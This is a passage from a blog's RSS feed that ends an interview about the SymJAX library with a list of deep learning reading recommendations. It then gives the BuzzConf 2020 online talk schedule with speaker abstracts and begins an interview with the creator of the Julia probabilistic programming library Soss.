&lt;p&gt;SymJAX was unstable in its early months, as many graph libraries were tested and various new features required drastic changes to the entire pipeline. We are now at a much more stable point where only a few remaining features are being tested and replaced (for example the graph visualization tool, the online data saving and visualization, and the graph canonicalization). Those changes are very localized and do not break any other part of the library. In its current state, SymJAX can already be used actively. Beyond that, the main remaining task is documentation: providing a rich gallery of examples detailing all the functionalities of SymJAX. Once those changes are done, the first stable release will be published; a rough estimate would put us a few weeks away from it.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;for-our-readers-who-might-want-to-know-more-what-papers-articles-and-courses-do-you-recommend-doing-to-learn-about-symbolic-programming-and-deep-learning&quot;&gt;For our readers who might want to know more, what papers, articles and courses do you recommend to learn about symbolic programming and deep learning?&lt;&#x2F;h4&gt;
&lt;p&gt;For a jump-start in deep learning, the Deep Learning book (&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.deeplearningbook.org&#x2F;&quot;&gt;https:&#x2F;&#x2F;www.deeplearningbook.org&#x2F;&lt;&#x2F;a&gt;) is complete and offers all the tricks of the trade for practitioners. For more in-depth understanding of deep networks there are way too many articles to cite so I will only refer to a few iconic ones in two topics that I particularly enjoy:&lt;&#x2F;p&gt;
&lt;p&gt;Orbits, Groups, Invariants and Manifolds&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;yann.lecun.com&#x2F;exdb&#x2F;publis&#x2F;pdf&#x2F;simard-98.pdf&quot;&gt;http:&#x2F;&#x2F;yann.lecun.com&#x2F;exdb&#x2F;publis&#x2F;pdf&#x2F;simard-98.pdf&lt;&#x2F;a&gt; (Transformation Invariance in Pattern Recognition, Tangent Distance and Tangent Propagation)&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;arxiv.org&#x2F;pdf&#x2F;1602.07576.pdf&quot;&gt;https:&#x2F;&#x2F;arxiv.org&#x2F;pdf&#x2F;1602.07576.pdf&lt;&#x2F;a&gt; (Group Equivariant Convolutional Networks)&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;arxiv.org&#x2F;pdf&#x2F;1203.1513.pdf&quot;&gt;https:&#x2F;&#x2F;arxiv.org&#x2F;pdf&#x2F;1203.1513.pdf&lt;&#x2F;a&gt; (Invariant Scattering Convolution Networks)&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;ai.stanford.edu&#x2F;~ang&#x2F;papers&#x2F;nips09-MeasuringInvariancesDeepNetworks.pdf&quot;&gt;https:&#x2F;&#x2F;ai.stanford.edu&#x2F;~ang&#x2F;papers&#x2F;nips09-MeasuringInvariancesDeepNetworks.pdf&lt;&#x2F;a&gt; (Measuring Invariances in Deep Networks)&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;Deep Generative Networks&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;arxiv.org&#x2F;pdf&#x2F;1701.00160.pdf&quot;&gt;https:&#x2F;&#x2F;arxiv.org&#x2F;pdf&#x2F;1701.00160.pdf&lt;&#x2F;a&gt; (NIPS 2016 Tutorial: Generative Adversarial Networks)&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;pure.uva.nl&#x2F;ws&#x2F;files&#x2F;17891313&#x2F;Thesis.pdf&quot;&gt;https:&#x2F;&#x2F;pure.uva.nl&#x2F;ws&#x2F;files&#x2F;17891313&#x2F;Thesis.pdf&lt;&#x2F;a&gt; (Variational inference &amp;amp; deep learning)&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;blog.evjang.com&#x2F;2018&#x2F;01&#x2F;nf1.html&quot;&gt;https:&#x2F;&#x2F;blog.evjang.com&#x2F;2018&#x2F;01&#x2F;nf1.html&lt;&#x2F;a&gt; (Normalizing Flows Tutorial)&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
</description>
      </item>
      <item>
          <title>For the first time, enjoy all the talks of BuzzConf 2020 online and free of charge!</title>
          <pubDate>Sun, 26 Jul 2020 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/for-the-first-time-enjoy-all-the-talks-of-buzzconf-2020-online-and-free-of-charge/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/for-the-first-time-enjoy-all-the-talks-of-buzzconf-2020-online-and-free-of-charge/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/for-the-first-time-enjoy-all-the-talks-of-buzzconf-2020-online-and-free-of-charge/">&lt;h3 id=&quot;come-see-buzzconf-2020-a-software-and-data-science-conference-open-and-online-for-one-and-for-all&quot;&gt;Come see BuzzConf 2020, a software and data science conference, open and online for one and for all!&lt;&#x2F;h3&gt;
&lt;p&gt;The third edition of BuzzConf will be held freely online via Zoom and YouTube Live. We’re very proud of our speaker lineup, which covers a wide range of topics that expand the frontiers of our technical knowledge.&lt;&#x2F;p&gt;
&lt;p&gt;We will dive into the topics of functional programming, Julia, Python, data science, machine learning, observability, operating systems and more! We believe Functional Programming and Data Science are two of the most interesting topics in the field which will open many opportunities in the near future, and we want to bring the latest developments in these areas to the global community.&lt;&#x2F;p&gt;
&lt;p&gt;This conference is the result of a combined effort of private and public sectors from Argentina, which aspires to help the development of our country’s technical capabilities while spreading and sharing knowledge with the world.&lt;&#x2F;p&gt;
&lt;p&gt;We thank the generosity of the speakers who agreed to donate their time and we hope you enjoy their talks as much as we will.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-LzNJkTEcILfT_6U8t2baDg.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h3 id=&quot;mon-july-27-2pm-pdt-6pm-gmt-3-9pm-utc&quot;&gt;Mon, July 27–2pm PDT &#x2F; 6pm GMT-3 &#x2F; 9pm UTC&lt;&#x2F;h3&gt;
&lt;h3 id=&quot;charity-majors-what-got-you-here-won-t-get-you-there-how-your-team-can-become-a-high-performing-team-by-embracing-observability&quot;&gt;Charity Majors — “What got you here won’t get you there: How your team can become a high-performing team by embracing observability”&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;em&gt;To Be Announced&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Join us on Zoom:&lt;&#x2F;em&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;zoom.us&#x2F;j&#x2F;92898927496&quot;&gt;&lt;em&gt;https:&#x2F;&#x2F;zoom.us&#x2F;j&#x2F;92898927496&lt;&#x2F;em&gt;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Join us on YouTube:&lt;&#x2F;em&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;youtu.be&#x2F;QK6zEFdvXYw&quot;&gt;&lt;em&gt;https:&#x2F;&#x2F;youtu.be&#x2F;QK6zEFdvXYw&lt;&#x2F;em&gt;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;0-fTWA2R7HUM90oPA7.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h3 id=&quot;mon-july-27-3pm-pdt-7pm-gmt-3-10pm-utc&quot;&gt;Mon, July 27–3pm PDT &#x2F; 7pm GMT-3 &#x2F; 10pm UTC&lt;&#x2F;h3&gt;
&lt;h3 id=&quot;maria-vanina-martinez-symbolic-reasoning-to-model-sentiment-and-knowledge-diffusion-in-social-networks&quot;&gt;María Vanina Martinez: “Symbolic Reasoning to model Sentiment and Knowledge Diffusion in Social Networks”&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;em&gt;Social media platforms, taken in conjunction, can be seen as complex networks; in this context, understanding how agents react to sentiments expressed by their connections is of great interest. We show how Network Knowledge Bases help represent the integration of multiple social networks, and explore how information flow can be handled via belief revision operators for local (agent-specific) knowledge bases. We report on preliminary experiments on Twitter data showing that different agent types react differently to the same information — this is a first step toward developing symbolic tools to predict how agents behave as information flows in their social environment.&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Join us on Zoom:&lt;&#x2F;em&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;zoom.us&#x2F;j&#x2F;92898927496&quot;&gt;&lt;em&gt;https:&#x2F;&#x2F;zoom.us&#x2F;j&#x2F;92898927496&lt;&#x2F;em&gt;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Join us on YouTube:&lt;&#x2F;em&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;youtu.be&#x2F;QK6zEFdvXYw&quot;&gt;&lt;em&gt;https:&#x2F;&#x2F;youtu.be&#x2F;QK6zEFdvXYw&lt;&#x2F;em&gt;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;0-Urum4vQ0RP0TZub3.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h3 id=&quot;tue-july-28-2pm-pdt-6pm-gmt-3-9pm-utc&quot;&gt;Tue, July 28–2pm PDT &#x2F; 6pm GMT-3 &#x2F; 9pm UTC&lt;&#x2F;h3&gt;
&lt;h3 id=&quot;will-kurt-the-limits-of-probability&quot;&gt;Will Kurt: “The Limits of Probability”&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;em&gt;Probability is an increasingly ubiquitous part of our daily lives, especially as developers, researchers and data scientists. It is easy to mistakenly think this powerful tool is all we need to understand our world. This talk will show how our current environment of global pandemic, political unrest and economic uncertainty forces us to face the limits of probability as a tool for reasoning and understanding. This talk will cover both practical examples of the limitations of probability as well as dive into the philosophical roots of these limitations to show that it cannot be our only means to engage with our world.&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Join us on Zoom:&lt;&#x2F;em&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;zoom.us&#x2F;j&#x2F;97859783809&quot;&gt;&lt;em&gt;https:&#x2F;&#x2F;zoom.us&#x2F;j&#x2F;97859783809&lt;&#x2F;em&gt;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Join us on YouTube:&lt;&#x2F;em&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;youtu.be&#x2F;N75ebGWz2o4&quot;&gt;&lt;em&gt;https:&#x2F;&#x2F;youtu.be&#x2F;N75ebGWz2o4&lt;&#x2F;em&gt;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;0-a3kX6m-ky8tQK27S.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h3 id=&quot;tue-july-28-3pm-pdt-7pm-gmt-3-10pm-utc&quot;&gt;Tue, July 28–3pm PDT &#x2F; 7pm GMT-3 &#x2F; 10pm UTC&lt;&#x2F;h3&gt;
&lt;h3 id=&quot;lightning-talks&quot;&gt;Lightning Talks&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;strong&gt;Juan Pablo Lorenzo:&lt;&#x2F;strong&gt; “Delete your code: in search of a minimalist approach to software development”&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Gajendra Deshpande:&lt;&#x2F;strong&gt; “Computation Techniques for Encrypted Data using Python”&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Join us on Zoom:&lt;&#x2F;em&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;zoom.us&#x2F;j&#x2F;97859783809&quot;&gt;&lt;em&gt;https:&#x2F;&#x2F;zoom.us&#x2F;j&#x2F;97859783809&lt;&#x2F;em&gt;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Join us on YouTube:&lt;&#x2F;em&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;youtu.be&#x2F;N75ebGWz2o4&quot;&gt;&lt;em&gt;https:&#x2F;&#x2F;youtu.be&#x2F;N75ebGWz2o4&lt;&#x2F;em&gt;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;h3 id=&quot;wed-july-29-2pm-pdt-6pm-gmt-3-9pm-utc&quot;&gt;Wed, July 29–2pm PDT &#x2F; 6pm GMT-3 &#x2F; 9pm UTC&lt;&#x2F;h3&gt;
&lt;h3 id=&quot;aditya-siram-what-fp-can-learn-from-static-introspection&quot;&gt;Aditya Siram: “What FP Can Learn From Static Introspection”&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;em&gt;What if compile time and type level programming in functional programming languages were easy, something you reach for without even thinking about it? What if you could debug type errors with a simple compile time print statement? Write highly flexible systems by being able to introspect into types at compile time? Pre-calculate large portions of your programs for great efficiency? Typed functional programming is a great and fun way to write resilient software, and as type systems have become more and more expressive in recent years, we are able to program sophisticated and useful properties at the type level for even better compile time safety. Just one problem: It is very difficult, requires advanced knowledge of the type system, the syntax is convoluted, the error messages are impenetrable, and it is nearly impossible to debug. This talk will dive into why we should steal static introspection from languages like Nim, and D, state-of-the-art imperative programming languages which can solve all these issues, make type systems much more approachable without losing any expressive power, and offer new design possibilities for functional programs.&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Join us on Zoom:&lt;&#x2F;em&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;zoom.us&#x2F;j&#x2F;95139644343&quot;&gt;&lt;em&gt;https:&#x2F;&#x2F;zoom.us&#x2F;j&#x2F;95139644343&lt;&#x2F;em&gt;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Join us on YouTube:&lt;&#x2F;em&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;youtu.be&#x2F;yGq0KnkqOgI&quot;&gt;&lt;em&gt;https:&#x2F;&#x2F;youtu.be&#x2F;yGq0KnkqOgI&lt;&#x2F;em&gt;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;0-Koxyxq-wrBx9iGfe.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h3 id=&quot;wed-july-29-3pm-pdt-7pm-gmt-3-10pm-utc&quot;&gt;Wed, July 29–3pm PDT &#x2F; 7pm GMT-3 &#x2F; 10pm UTC&lt;&#x2F;h3&gt;
&lt;h3 id=&quot;sergio-chouhy-deeploying-deep-q-learning-with-pytorch&quot;&gt;Sergio Chouhy: “Deeploying Deep Q Learning with Pytorch”&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;em&gt;Many things are being said about Deep Reinforcement Learning, but sometimes it is really hard to know where to start. In this talk, I will tell you all about the basics of these algorithms and show you how to deploy Deep Q Learning from scratch using Pytorch. I will also be talking about industrial applications for this technology.&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Join us on Zoom:&lt;&#x2F;em&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;zoom.us&#x2F;j&#x2F;95139644343&quot;&gt;&lt;em&gt;https:&#x2F;&#x2F;zoom.us&#x2F;j&#x2F;95139644343&lt;&#x2F;em&gt;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Join us on YouTube:&lt;&#x2F;em&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;youtu.be&#x2F;yGq0KnkqOgI&quot;&gt;&lt;em&gt;https:&#x2F;&#x2F;youtu.be&#x2F;yGq0KnkqOgI&lt;&#x2F;em&gt;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;0-82lbeMCqONPXiKq1.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h3 id=&quot;thu-july-30-2pm-pdt-6pm-gmt-3-9pm-utc&quot;&gt;Thu, July 30–2pm PDT &#x2F; 6pm GMT-3 &#x2F; 9pm UTC&lt;&#x2F;h3&gt;
&lt;h3 id=&quot;viral-b-shah-julia-a-language-for-ai-and-much-more&quot;&gt;Viral B. Shah: “Julia — A language for AI and much more”&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;em&gt;The Julia language is now used by over half a million programmers worldwide. Created to solve the two language problem, Julia is demonstrating performance gains of 50x-100x for many data science tasks such as data loading, data processing, graph processing, machine learning and scaling. Robust support for modern deep learning and the ability to do differentiable programming in an intuitive way is quickly leading to Julia becoming the language of choice for AI workloads. My talk will discuss the origin story of Julia, the formation of the Julia community, and all the amazing things happening in the world of Julia.&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Join us on Zoom:&lt;&#x2F;em&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;zoom.us&#x2F;j&#x2F;94906592252&quot;&gt;&lt;em&gt;https:&#x2F;&#x2F;zoom.us&#x2F;j&#x2F;94906592252&lt;&#x2F;em&gt;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Join us on YouTube:&lt;&#x2F;em&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;youtu.be&#x2F;fbKHLdoG7wA&quot;&gt;&lt;em&gt;https:&#x2F;&#x2F;youtu.be&#x2F;fbKHLdoG7wA&lt;&#x2F;em&gt;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;0--gyZtKfGpWBIxRoz.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h3 id=&quot;thu-july-30-3pm-pdt-7pm-gmt-3-10pm-utc&quot;&gt;Thu, July 30–3pm PDT &#x2F; 7pm GMT-3 &#x2F; 10pm UTC&lt;&#x2F;h3&gt;
&lt;h3 id=&quot;chris-rackauckas-sciml-how-language-is-changing-scientific-research&quot;&gt;Chris Rackauckas: “SciML: How Language is Changing Scientific Research”&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;em&gt;Scientific machine learning is a burgeoning field, and it’s taking off in Julia. Why? The purpose of this talk is to dive into that question: how has language accelerated the development of Julia’s SciML ecosystem? The core is composability through multiple dispatch. We will showcase how this feature is not only what makes standard Julia code as fast as C or Fortran, but also allows Julia to eschew the traditional idea of “machine learning frameworks” and instead have machine learning directly work on the standard functions and libraries of the whole Julia programming language. This language-wide differentiable programming then builds a foundation where existing climate models, helicopter simulations, and efficiency simulators for battery-powered airplanes can be instantly composed with new tools for machine learning, and we will demonstrate how this has changed the way that researchers in Julia do science.&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Join us on Zoom:&lt;&#x2F;em&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;zoom.us&#x2F;j&#x2F;94906592252&quot;&gt;&lt;em&gt;https:&#x2F;&#x2F;zoom.us&#x2F;j&#x2F;94906592252&lt;&#x2F;em&gt;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Join us on YouTube:&lt;&#x2F;em&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;youtu.be&#x2F;fbKHLdoG7wA&quot;&gt;&lt;em&gt;https:&#x2F;&#x2F;youtu.be&#x2F;fbKHLdoG7wA&lt;&#x2F;em&gt;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;0-2EbV5-0r03R6aPYH.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h3 id=&quot;fri-july-31-2pm-pdt-6pm-gmt-3-9pm-utc&quot;&gt;Fri, July 31–2pm PDT &#x2F; 6pm GMT-3 &#x2F; 9pm UTC&lt;&#x2F;h3&gt;
&lt;h3 id=&quot;pablo-fernandez-machine-learning-in-the-real-world&quot;&gt;Pablo Fernandez: “Machine Learning in The Real World”&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;em&gt;A tour of the last 3 years of my career, in which I’ve productionized 3 different machine learning projects at a kind-of-big company (Despegar). Some of the challenges faced, not only technical but also from a product standpoint, and some of the pedagogical work needed to convince others to let important decisions be made by a machine. Hopefully there are insights here that help you bring your own models to production.&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Join us on Zoom:&lt;&#x2F;em&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;zoom.us&#x2F;j&#x2F;92628004626&quot;&gt;&lt;em&gt;https:&#x2F;&#x2F;zoom.us&#x2F;j&#x2F;92628004626&lt;&#x2F;em&gt;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Join us on YouTube:&lt;&#x2F;em&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;youtu.be&#x2F;t-ebpSHyBEE&quot;&gt;&lt;em&gt;https:&#x2F;&#x2F;youtu.be&#x2F;t-ebpSHyBEE&lt;&#x2F;em&gt;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;0-7y4gqQ8d8_6veW_j.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h3 id=&quot;fri-july-31-3pm-pdt-7pm-gmt-3-10pm-utc&quot;&gt;Fri, July 31–3pm PDT &#x2F; 7pm GMT-3 &#x2F; 10pm UTC&lt;&#x2F;h3&gt;
&lt;h3 id=&quot;peter-alvaro-what-not-where-why-a-blue-sky-os&quot;&gt;Peter Alvaro: “What not where: why a blue sky OS?”&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;em&gt;A world of distributed, persistent memory is on its way. Our programming models traditionally operate on short-lived data representations tied to ephemeral contexts such as processes or computers. In the limit, however, data lifetime is infinite compared to these transient actors. We discuss the implications for programming models raised by a world of large and potentially persistent distributed memories, including the need for explicit, context-free, invariant data references. We present a novel operating system that uses wisdom from both storage and distributed systems to center the programming model around data as the primary citizen, and reflect on the transformative potential of this change for infrastructure and applications of the future.&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Join us on Zoom:&lt;&#x2F;em&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;zoom.us&#x2F;j&#x2F;92628004626&quot;&gt;&lt;em&gt;https:&#x2F;&#x2F;zoom.us&#x2F;j&#x2F;92628004626&lt;&#x2F;em&gt;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Join us on YouTube:&lt;&#x2F;em&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;youtu.be&#x2F;t-ebpSHyBEE&quot;&gt;&lt;em&gt;https:&#x2F;&#x2F;youtu.be&#x2F;t-ebpSHyBEE&lt;&#x2F;em&gt;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;0-MOD81ymGRUNUrv7m.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;We hope to see you there! There will be time for Q&amp;amp;A with the speakers. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.eventbrite.com.ar&#x2F;e&#x2F;buzzconf-2020-tickets-111836742708&quot;&gt;Register now&lt;&#x2F;a&gt;!&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Soss: Probabilistic Programming with Julia</title>
          <pubDate>Tue, 19 May 2020 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/soss-probabilistic-programming-with-julia/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/soss-probabilistic-programming-with-julia/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/soss-probabilistic-programming-with-julia/">&lt;h4 id=&quot;an-interview-with-its-creator-chad-scherrer&quot;&gt;An interview with its creator, Chad Scherrer&lt;&#x2F;h4&gt;
&lt;p&gt;By: Javier Rodríguez Chatruc and Federico Carrone&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-m6924vcooeuQEu7FiBOI5A.png&quot; alt=&quot;&quot; &#x2F;&gt;Credit: Chad Scherrer&lt;&#x2F;p&gt;
&lt;p&gt;Probabilistic programming is at this point an established field both for research and industry applications, but like everything else (especially in the tech industry), it is undergoing constant evolution. This is where &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;julialang.org&#x2F;&quot;&gt;Julia&lt;&#x2F;a&gt; comes in — designed for high performance in the world of data science, it seems to be the perfect fit for probabilistic programming.&lt;&#x2F;p&gt;
&lt;p&gt;To learn more about this world we contacted &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;chadscherrer&quot;&gt;Chad Scherrer&lt;&#x2F;a&gt;, the creator of &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;cscherrer&#x2F;Soss.jl&quot;&gt;Soss&lt;&#x2F;a&gt;, a probabilistic programming library written entirely in Julia. With a very clean syntax resembling math notation, Soss seems to bridge the gap between the more academic side of data science and the more technical&#x2F;developer one, while also providing speed and &lt;em&gt;first-class&lt;&#x2F;em&gt; models.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;h4 id=&quot;please-tell-us-a-bit-about-yourself-what-is-your-background-what-is-your-current-position&quot;&gt;Please tell us a bit about yourself. What is your background? what is your current position?&lt;&#x2F;h4&gt;
&lt;p&gt;Starting out, I thought I would end up focusing on algebraic topology. So I did coursework along these lines for a few years before switching to stats. My thesis is on a special case of multivariate normal distributions with a group symmetry, so algebra still plays a big part.&lt;&#x2F;p&gt;
&lt;p&gt;After graduating, I worked at Pacific Northwest National Laboratory, mostly doing computational statistics. I learned some Python, then R. The high-level coding was nice, but I was frustrated by how awkward it was to make it fast.&lt;&#x2F;p&gt;
&lt;p&gt;One day I came across this “Great Computer Language Shootout”, where OCaml was really dominating. So I used that for a few years. Then multicore hardware started really picking up, but at the time the OCaml team said they wouldn’t really be doing anything with SMP (symmetric multiprocessing). So I started looking around again, and found Haskell.&lt;&#x2F;p&gt;
&lt;p&gt;Along the way, I had collaborated with the high-performance computing group doing &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;arxiv.org&#x2F;pdf&#x2F;1206.6409.pdf&quot;&gt;parallel&lt;&#x2F;a&gt; &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;arxiv.org&#x2F;pdf&#x2F;1212.4174v1.pdf&quot;&gt;machine learning&lt;&#x2F;a&gt; using C&#x2F;OpenMP. And I started getting interested in probabilistic programming. I wanted to make something like &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;mcmc-jags.sourceforge.net&#x2F;&quot;&gt;JAGS&lt;&#x2F;a&gt;, but using Haskell and allowing more high-level expressiveness. So I collaborated with Galois to develop &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;cscherrer.github.io&#x2F;pdf&#x2F;Scherrer%20-%202012%20-%20Passage%20A%20Parallel%20Sampler%20Generator%20for%20Hierarchical%20Bayesian%20Modeling.pdf&quot;&gt;Passage&lt;&#x2F;a&gt;, which works in terms of a now-standard probability monad, and produces C&#x2F;OpenMP code for 